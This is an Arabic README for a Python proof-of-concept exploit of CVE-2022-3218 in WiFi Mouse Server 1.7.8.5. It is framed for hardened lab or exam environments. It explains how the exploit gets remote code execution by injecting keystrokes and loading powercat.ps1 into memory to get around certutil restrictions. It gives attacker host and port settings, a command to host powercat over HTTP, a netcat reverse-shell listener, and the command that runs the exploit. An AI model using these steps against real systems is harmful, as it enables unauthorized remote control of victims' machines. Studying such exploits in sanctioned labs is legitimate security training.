
استغلال PoC لثغرة CVE-2022-3218 يستهدف WiFi Mouse Server 1.7.8.5، ويحقّق تنفيذًا عن بُعد (RCE) عبر حقن ضغطات المفاتيح وتسليم حمولة PowerShell في الذاكرة للمختبرات المحصّنة.
استغلال Python 3 مُحسَّن (PoC) لثغرة WiFi Mouse Server v1.7.8.5. يستغل هذا السكربت ثغرة بروتوكولية كامنة لتحقيق تنفيذ أوامر عن بُعد (RCE) عبر حقن ضغطات المفاتيح تلقائيًا.
تم تعديل هذا الإصدار وضبطه بشكل صريح لبيئات المختبرات حيث تفشل الاستغلالات العامة التقليدية بسبب قيود تحصين المضيف (مثل تقييد تنفيذ certutil.exe أو منع تنزيل الملفات الثنائية).
cmd.exe و certutil.exe لإسقاط ملف تنفيذي خبيث على القرص. في هياكل الامتحانات/المختبرات المُحصَّنة أو الحديثة، غالبًا ما تكون هذه الأدوات (LOLBins) مقيدة أو محظورة بواسطة نهج المجموعة المحلي. ينقل هذا الإصدار المعدَّل المتجه بالكامل إلى الذاكرة عبر نموذج ويب PowerShell باستخدام powercat.ps1.افتح السكربت وحدِّث متغيرات الإعداد في أعلى الملف وفقًا لإعدادات بيئتك المحلية:
rhost = sys.argv[1]
lhost = "192.168.45.167" # عنوان المهاجم/كالي الخاص بك
lport = "443" # منفذ مستمع Netcat لديك
http_port = "80" # منفذ خادم HTTP المحلي الذي يستضيف powercat
استضف powercat.ps1 على جهاز المهاجم المحلي داخل مجلد:
python3 -m http.server 80
في نافذة طرفية منفصلة، أنشئ مستمع الصدفة العكسية على الـ lport المُعد:
nc -lvnp 443
نفِّذ السكربت ضد عنوان IP للجهاز الهدف:
python3 exploit.py <TARGET-IP>